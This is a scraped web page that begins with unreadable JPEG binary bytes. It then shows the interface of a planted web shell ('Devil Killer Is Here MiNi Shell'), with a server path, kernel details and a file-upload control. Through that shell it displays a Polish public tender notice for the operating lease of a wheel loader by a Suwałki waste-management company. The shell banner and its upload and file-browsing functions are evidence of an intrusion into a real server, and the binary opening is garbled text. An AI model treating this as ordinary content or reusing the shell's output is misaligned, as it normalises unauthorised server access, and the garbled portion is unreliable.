JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231212/0054716201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup w formie leasingu operacyjnego ładowarki kołowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Gospodarki Odpadami w Suwałkach Sp. z o. o.</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">PGO w Suwałkach Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 200680900</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Sejneńska, 82</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Suwałki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@pgo.suwalki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://pgo.suwalki.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka prawa handlowego </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka odpadami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup w formie leasingu operacyjnego ładowarki kołowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3a5d9bea-98e5-11ee-ba3b-4e891c384685</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00547162</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3a5d9bea-98e5-11ee-ba3b-4e891c384685 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy e-<br/>Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. Korzystanie z platformy e-Zamówienia jest bezpłatne.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>”Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>3. Przeglądanie i pobierania publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>4. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wniosków o wyjaśnienie treści SWZ, wezwań i zawiadomień, dokumentów i wyjaśnień<br/>składanych na wezwanie Zamawiającego. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesłanej<br/>wiadomości (przycisk „dodaj załącznik).<br/>5. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji<br/>w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie<br/>e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do<br/>zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. Konta uproszczonego na<br/>Platformie e-Zamówienia.<br/>6. Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do Komunikacji” wynosi 150 MB.<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>9. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego<br/>dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej<br/>https://ezamowienia.gov.pl w zakładce &#34;zgłoś problem&#34;.<br/>10. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej pod adresem e-mail:<br/>biuro@pgo.suwalki.pl <br/>11. Zamawiający dopuszcza możliwość składania przez Wykonawców innych dokumentów, w tym podmiotowych środków<br/>dowodowych, wniosków o wyjaśnienie treści SWZ, informacji, oświadczeń lub dokumentów przekazywanych w postępowaniu, oraz<br/>elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektroniczne na adres e-mail: biuro@pgo.suwalki.pl (z wyłączeniem składania ofert)<br/>12. Za datę przekazania oferty wraz z wymaganymi załącznikami przyjmuje się datę ich przekazania na Platformę e-Zamówienia.<br/>13. Za datę przekazania innych dokumentów, w tym podmiotowych środków dowodowych oraz innych informacji, oświadczeń lub<br/>dokumentów przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na Platformę e-Zamówienia lub na pocztę<br/>elektroniczną na adres e-mail: biuro@pgo.suwalki.pl<br/>(z wyłączeniem składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych – Dz. Urz. UE<br/>L 119 z 04.05.2016 r.), dalej „RODO” oraz przepisów ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (t.j. Dz. U. z 2018<br/>r. poz. 1000, z późn. zm.), Zamawiający w przypadku pozyskania, w celu związanym z niniejszym postępowaniem o udzielenie<br/>zamówienia publicznego względem osób fizycznych danych osobowych spełnia obowiązek informacyjny w tym zakresie i informuje,<br/>że:<br/>1) Administratorem danych osobowych w tym zakresie jest Prezes Przedsiębiorstwa Gospodarki Odpadami w Suwałkach Sp. z o.o.<br/>ul. Raczkowska 150A, 16-400 Suwałki, tel. 87 566 52 13.<br/>2) Inspektorem ochrony danych osobowych w Przedsiębiorstwa Gospodarki Odpadami w Suwałkach Sp. z o. o. jest Pan Tomasz<br/>Łazarski, tel. 87 566 52 13,<br/>e-mail: t.lazarski@pgo.suwalki.pl.<br/>3) Uzyskane dane osobowe przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia pn. „Zakup w formie<br/>leasingu operacyjnego ładowarki kołowej”, znak sprawy K-17/2023, prowadzonego w trybie podstawowym w oparciu o art. 275 ust. 1<br/>ustawy Pzp.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">4) Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania.<br/>5) Dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia publicznego, chyba że okres dłuższy będzie wynikał z obowiązujących przepisów prawa lub uzasadnionego<br/>interesu Zamawiającego. Nadto dane będą przetwarzane przez okres wynikający ze zobowiązań związanych z obowiązkiem<br/>archiwizacji danych dotyczących realizacji projektów finansowanych ze środków Unii Europejskiej. Okres przechowywania obejmuje<br/>cały czas trwania umowy.<br/>6) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisanych ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) W odniesieniu do podanych danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO.<br/>8) Osoba, której dane osobowe dotyczą, o ile przepis szczególny nie stanowi inaczej, posiada:<br/>a) prawo do dostępu do danych osobowych, które jej dotyczą,<br/>b) prawo do sprostowania danych osobowych, które jej dotyczą (skorzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy),<br/>c) prawo żądania od administratora ograniczenia przetwarzania danych osobowych, które jej dotyczą, z zastrzeżeniem przypadków,<br/>o których mowa w art. 18 ust. 2 RODO.<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie tych danych<br/>osobowych narusza przepisy RODO.<br/>9) Osobie, której dane osobowe dotyczą, nie przysługuje:<br/>a) prawo do usunięcia danych osobowych, w związku z art. 17 ust. 3 lit. b, d lub e RODO,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10) Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">K-17/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa fabrycznie nowej ładowarki kołowej w formie leasingu operacyjnego z opcją<br/>wykupu, tj. odpłatne korzystanie w ramach leasingu operacyjnego za umówione raty leasingowe w okresie 36 miesięcy (3<br/>lata) od daty podpisania protokołu odbioru przedmiotu leasingu, na warunkach określonych szczegółowo w warunkach<br/>leasingu Wykonawcy. Ładowarka kołowa przeznaczona będzie do prac związanymi z przetwarzaniem odpadów<br/>komunalnych, w tym także odpadów gruzu, odpadów biodegradowalnych, odpadów posortowniczych składowanych na<br/>składowisku odpadów, na potrzeby Instalacji Komunalnej w Suwałkach zarządzanej przez Przedsiębiorstwo Gospodarki<br/>Odpadami w Suwałkach Sp. z o. o.<br/>2. Szczegółowy opis techniczny przedmiotu zamówienia określony został w rozdziale 3 SWZ.<br/>3. Inne wymagania.<br/>1) Wykonawca dostarczy przedmiot zamówienia do zakładu Zamawiającego<br/>w Suwałkach, tj. Przedsiębiorstwo Gospodarki Odpadami w Suwałkach Sp. z o. o.,<br/>ul. Raczkowska 150A, własnym staraniem i na własny koszt.<br/>2) Wykonawca przeszkoli na własny koszt wskazany przez Zamawiającego personel<br/>w zakresie eksploatacji, konserwacji i BHP przedmiotu zamówienia. Szkolenie powinno być przeprowadzone najpóźniej w<br/>dniu podpisania protokołu odbioru bez uwag i winno obejmować część teoretyczną jak i demonstracyjną. Fakt dokonania<br/>szkolenia zostanie potwierdzony protokołem. 3) Warunki dodatkowe:<br/>• dostarczenie specyfikacji technicznej oferowanej ładowarki teleskopowej wraz z certyfikatem CE w języku polskim oraz<br/>innych dokumentów (foldery, ulotki, katalogi, opinie techniczne) potwierdzające spełnienie parametrów technicznych w<br/>języku polskim,<br/>• dostarczenie gwarancji z książką gwarancyjną i instrukcją w języku polskim przedmiotu zmówienia,<br/>• dostarczenie katalogu części zamiennych oraz harmonogramu wykonywanych obsług technicznych w języku polskim,<br/>• rozruch ładowarki w miejscu dostawy,<br/>• niezbędny zestaw narzędzi do codziennej obsługi ładowarki,<br/>• świadczenie serwisu w okresie gwarancji – reakcja serwisu w okresie gwarancji<br/>do 24 h w dni robocze od poniedziałku do piątku.<br/>Powyższy opis zawiera minimalne wymagania, co oznacza, że Wykonawca może oferować przedmiot zamówienia<br/>charakteryzujący się lepszymi parametrami technicznymi i funkcjonalnymi pod warunkiem, że nie będą one miały wpływu na<br/>wyższe koszty eksploatacji.<br/>Minimalny okres gwarancji wynosi co najmniej 24 miesiące bez limitu motogodzin pracy ładowarki kołowej, liczone od daty<br/>odbioru końcowego przedmiotu zamówienia potwierdzonego protokołem zdawczo-odbiorczym. Szacowany czas pracy<br/>ładowarki wynosić będzie ok. 1500-2000 mth w okresie 12 miesięcy. Jest to wartość szacunkowa i służy Wykonawcy<br/>pomocniczo do przygotowania oferty i skalkulowania kosztów, natomiast nie stanowi podstawy do jakichkolwiek roszczeń z<br/>tego tytułu.<br/>4. Warunki dostawy przedmiotu zamówienia.<br/>1) Dokumentem stwierdzającym wykonanie dostawy będzie protokół zdawczo-odbiorczy podpisany przez upoważnionych<br/>przedstawicieli stron bez uwag.<br/>2) Zamawiający wymaga, aby przedmiot zamówienia został zrealizowany najpóźniej<br/>w ciągu 30 dni od daty podpisania umowy.<br/>3) Zamawiający zobowiązuje się do zapewnienia odpowiednich warunków w celu sprawnego przeprowadzenia odbioru<br/>przedmiotu zamówienia.<br/>4) Zamawiający może odmówić odbioru przedmiotu zamówienia i żądać jego naprawy lub odstąpić od umowy z winy<br/>Wykonawcy.<br/>5) Wykonawca powiadomi Zamawiającego o terminie dostawy przedmiotu zamówienia nie później niż na 2 dni roboczych<br/>przed planowanym terminem dostawy. Powiadomienie powinno być sporządzone w formie pisemnej i przesłane pocztą lub<br/>e-mail.<br/>6) Zamawiający ma prawo odmowy odbioru przedmiotu zamówienia w przypadku nie dotrzymania przez Wykonawcę<br/>terminu określonego w ofercie Wykonawcy.<br/>7) Za datę przekazania przedmiotu zamówienia przyjmuje się dzień podpisania przez upoważnionych przedstawicieli Stron<br/>bezusterkowego protokołu zdawczo-odbiorczego (bez uwag), który zostanie sporządzony w miejscu odbioru przedmiotu<br/>zamówienia (zakład Spółki PGO w Suwałkach, ul. Raczkowska 150A, 16-400 Suwałki).<br/>8) Zamawiający może odmówić odbioru przedmiotu zamówienia wówczas, gdy:<br/>- stwierdzi wady przedmiotu umowy,<br/>- przedmiot zamówienia nie będzie odpowiadał warunkom określonym w SWZ lub w ofercie Wykonawcy.<br/>W przypadku stwierdzenia okoliczności, o których mowa w niniejszym<br/>punkcie Zamawiający wyznaczy Wykonawcy dodatkowy termin na dostarczenie przedmiotu zamówienia zgodnego z SWZ i<br/>wolnego od wad (nie dłuższy niż 10 dni roboczych). Po bezskutecznym upływie powyższego terminu Zamawiający będzie<br/>miał prawo odstąpić od umowy w całości.<br/>5. Warunki gwarancji<br/>1) Wykonawca zapewni udzielenie pełnej gwarancji na przedmiot zamówienia w ilości minimum 24 miesięcy bez limitu<br/>motogodzin na pracę oferowanej ładowarki kołowej. W przypadku napraw gwarancyjnych Wykonawca zapewni podjęcie<br/>działań w okresie nie dłuższym niż 24 godziny w dni robocze od poniedziałku do piątku od momentu zgłoszenia pisemnie<br/>nie lub telefonicznie usterki. Wykonawca zapewnia okres usunięcia wad i usterek oraz zwrot po naprawie sprawnie<br/>działającego sprzętu w czasie nie dłuższym niż 5 dni roboczych, liczonych od dnia przyjęcia w/w zgłoszenia. W przypadku<br/>gdy termin usunięcia usterki okaże się dłuższy, począwszy od 6 dnia roboczego Wykonawca dostarczy zastępczy sprzęt o<br/>identycznych lub lepszych parametrach nieodpłatnie.<br/>2) Okres gwarancji przedłuża się każdorazowo o liczbę dni przestoju spowodowanego czasem naprawy.<br/>3) Wykonawca w okresie gwarancji zapewnia bezpłatny serwis oferowanego sprzętu i dostępność wszystkich części<br/>zamiennych (w okresie gwarancji dojazd, robocizna i materiały eksploatacyjne, jak filtry, oleje, łożyska, przewody<br/>hydrauliczne oraz inne przewody, hamulce, itp. części eksploatacyjne na koszt Wykonawcy).<br/>4) W przypadku, gdy naprawa powstałych usterek lub wad nie będzie możliwa lub zasadna z powodu nadmiernych kosztów<br/>naprawy lub trudności organizacyjnych, Wykonawca zobowiązany jest wymienić uszkodzoną ładowarkę kołową w możliwie<br/>najkrótszym terminie, jednak nie później niż w czasie 30 dni kalendarzowych od daty przyjęcia zgłoszenia.<br/>5) W przypadku, kiedy na skutek wad fizycznych zaistnieje potrzeba wymiany ładowarki kołowej na nową, a wskazany w<br/>umowie model nie będzie już dostępny do sprzedaży na rynku, Wykonawca może zaproponować Zamawiającemu inny<br/>model ładowarki kołowej spełniającej wymagania wskazane w SWZ.<br/>6. Kary umowne:<br/>1) W przypadku zwłoki Wykonawcy w usunięciu wad stwierdzonych w okresie gwarancji, Wykonawca zapłaci karę umowną<br/>w wysokości 0,5% wynagrodzenia brutto za każdy dzień zwłoki.<br/>2) W przypadku odstąpienia od niniejszej umowy przez Wykonawcę z przyczyn, za które ponosi odpowiedzialność, jest on<br/>zobowiązany zapłacić Zamawiającemu tytułem odszkodowania 10 % wynagrodzenia umownego.<br/>7. Wymagania dotyczące finansowania (leasing): 1) Waluta: PLN.<br/>2) Finansowanie w formie leasingu operacyjnego.<br/>3) Okres finansowania: 36 miesięcy (3 lata), opłata wstępna 45% wartości netto, Wykonawca określi wysokość oraz wskaże<br/>termin opłaty wstępnej w harmonogramie spłat leasingowych, który zostanie dołączony do oferty (Zamawiający dopuszcza<br/>przedłożenie harmonogramu finansowego spłat leasingowych w dacie odbioru przedmiotem zamówienia).<br/>4) Pierwsza rata zostanie zapłacona w terminie 7 dni od dnia podpisania umowy leasingu (pierwsza rata – opłata wstępna),<br/>każda następna rata w kolejnych miesięcznych okresach zgodnie z podanym przez Wykonawcę harmonogramem spłaty rat<br/>leasingowych licząc od dnia odbioru przedmiotu leasingu poprzez protokolarne podpisanie odbioru bez uwag wraz ze<br/>wszystkimi niezbędnymi dokumentami umożliwiającymi jego eksploatację.<br/>5) Wykup związany z zakupem przedmiotu leasingu 5% wartości netto przedmiotu zamówienia: opłata końcowa (wartość<br/>resztkowa), po upływie okresu obowiązywania umowy leasingowej, płatnej z ostatnią ratą leasingową. Zamawiający będzie<br/>miał prawo dokonania wykupu przedmiotu leasingu na własność po upływie okresu obowiązywania umowy pod warunkiem<br/>spłacenia przez Zamawiającego wszelkich należności wynikających z umowy leasingu.<br/>6) W raty leasingowe powinny być wliczone koszty, które poniesie Zamawiający jako korzystający. W szczególności cena<br/>powinna obejmować koszt nabycia przez finansującego przedmiotu zamówienia (leasingu). Podatek od środków<br/>transportowych oraz opłaty za rejestrację płatne są przez Zamawiającego na podstawie refaktur otrzymywanych od<br/>Wykonawcy do wysokości rzeczywistych kosztów.<br/>7) Oprocentowanie zmienne obliczone w oparciu o stopę WIBOR 1M, do celów porównania ofert przyjmuje się<br/>oprocentowanie w oparciu o stawkę WIBOR 1M aktualną na dzień przez upływem terminu składania ofert.<br/>8) Zamawiający ubezpieczy przedmiot leasingu na własny koszt (od wszystkich ryzyk),<br/>a Wykonawca wyraża na to zgodę bez dodatkowych prowizji z tego tytułu.<br/>9) Zamawiający nie przewiduje żadnego zabezpieczenia do umowy, np. w postaci weksla<br/>in blanco z deklaracją wekslową.<br/>10) Zamawiający w okresie trwania leasingu będzie miał prawo do dodatkowego wyposażenia ładowarki kołowej w opcje<br/>dodatkowe. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43261100-1 - Ładowarki mechaniczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66114000-2 - Usługi leasingu finansowego</p> <p class="mb-0">80511000-9 - Usługi szkolenia personelu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu 